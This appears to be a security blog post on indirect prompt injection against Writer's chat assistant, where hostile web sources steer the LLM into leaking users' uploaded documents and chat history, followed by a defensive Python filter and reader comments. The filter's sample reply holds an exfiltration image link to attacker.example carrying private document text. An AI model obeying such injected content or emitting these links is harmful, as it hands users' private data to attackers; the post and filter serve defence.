Data Exfiltration Using Indirect Prompt Injection

Interesting attack on an LLM:

In Writer, users can enter a ChatGPT-like session to edit or create their documents. In this chat session, the LLM can retrieve information from sources on the web to assist users in creation of their documents. We show that attackers can prepare websites that, when a user adds them as a source, manipulate the LLM into sending private information to the attacker or perform other malicious activities.

The data theft can include documents the user has uploaded, their chat history or potentially specific private information the chat model can convince the user to divulge at the attacker’s behest.
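A defender-side illustration of the point above, added here and not part of Schneier's post or of Writer's or the researchers' code. It assumes one concrete exfiltration channel, which the post does not spell out: the manipulated model emits an outbound URL (for example a markdown image) whose query string carries text copied from the user's private document. The screen below runs over the model's reply before it is rendered, strips any link whose host is not on an allow-list, and separately flags links whose decoded URL contains a run of words from the user's document. The document, the allow-list and the reply are all constructed sample data.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed sample data (not from the original post): a document the user
# uploaded, a hypothetical allow-list of hosts the chat UI may link to, and a
# model reply that a hostile web "source" has steered into embedding the
# document in an outbound image URL.
PRIVATE_DOC = "Q3 forecast: revenue target 4.2M, layoffs planned in March."
ALLOWED_HOSTS = {"writer.com", "docs.writer.com"}
SAMPLE_RESPONSE = (
    "Here is your revised draft.\n\n"
    "![status](https://attacker.example/collect?d=Q3%20forecast%3A%20revenue%20target%204.2M)\n"
    "See also https://docs.writer.com/help for formatting tips."
)

# Matches markdown links/images, angle-bracket URLs and bare URLs.
URL_RE = re.compile(
    r"!?\[[^\]]*\]\((https?://[^)\s]+)\)"   # [text](url) or ![alt](url)
    r"|<(https?://[^>\s]+)>"                 # <url>
    r"|(https?://[^\s)\]>]+)"                # bare url
)


def extract_urls(text):
    """Return every outbound URL the model emitted, in order of appearance."""
    return [next(g for g in m.groups() if g) for m in URL_RE.finditer(text)]


def carries_private_data(url, private_text, ngram=3):
    """True if the percent-decoded URL contains any run of `ngram` consecutive
    words from the private document. Both sides are reduced to lower-case word
    tokens so punctuation and URL encoding do not hide a match. Other encodings
    of the stolen text (e.g. base64) are out of scope for this check."""
    haystack = " ".join(re.findall(r"\w+", unquote(url).lower()))
    words = re.findall(r"\w+", private_text.lower())
    for i in range(len(words) - ngram + 1):
        if " ".join(words[i:i + ngram]) in haystack:
            return True
    return False


def screen_response(response, private_text=PRIVATE_DOC, allowed_hosts=ALLOWED_HOSTS):
    """Rewrite a model reply so that only links to allow-listed hosts that carry
    no private text survive. Returns (cleaned_text, findings) where findings
    lists each removed link with the reasons it was blocked."""
    findings = []

    def _replace(match):
        url = next(g for g in match.groups() if g)
        host = (urlparse(url).hostname or "").lower()
        reasons = []
        if host not in allowed_hosts:
            reasons.append("host not on allow-list")
        if carries_private_data(url, private_text):
            reasons.append("URL contains private document text")
        if reasons:
            findings.append({"url": url, "host": host, "reasons": reasons})
            return "[link removed]"
        return match.group(0)  # keep the original markdown untouched

    return URL_RE.sub(_replace, response), findings


if __name__ == "__main__":
    cleaned, found = screen_response(SAMPLE_RESPONSE)
    print(cleaned)
    for item in found:
        print("blocked:", item["url"], "->", "; ".join(item["reasons"]))
```

The allow-list is the control that actually stops the leak, since an attacker can choose an encoding the n-gram check will not recognise; the private-text match is there to turn a silently dropped link into a logged incident, which is what an operator needs to notice that a source page is hostile.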

Posted on December 22, 2023 at 7:05 AM

Comments

Morley December 22, 2023 12:14 PM

I wonder about the expense of fuzzy-searching all results for private data. Unless this is one of those LLMs where you can say, “in the style of Shakespeare”. I wonder if a second, security-filter LLM would be as big or bigger than the original.

Clive Robinson December 22, 2023 12:47 PM

@ ALL,

Bearing in mind my point of view[1].

This does not in the slightest surprise me.

But what of others,

“Are you surprised by this?”

It would be interesting to find out the general view.

[1] I’ve been saying for some time now on this blog and other places I think that LLM ML AI is primarily an insidious “surveillance tool” of great effectiveness…

MikeOh Shark December 23, 2023 6:44 AM

Allow access to LLMs? NO!

I don’t even trust the current trend to put help files on the web. I understand the programmer’s desire for better metrics but many of the tools I use run in firejails that disable web access. At least I know that my laptop isn’t useless when I don’t have web access.

Of course I do need the feeds to see what is going on. 🙂
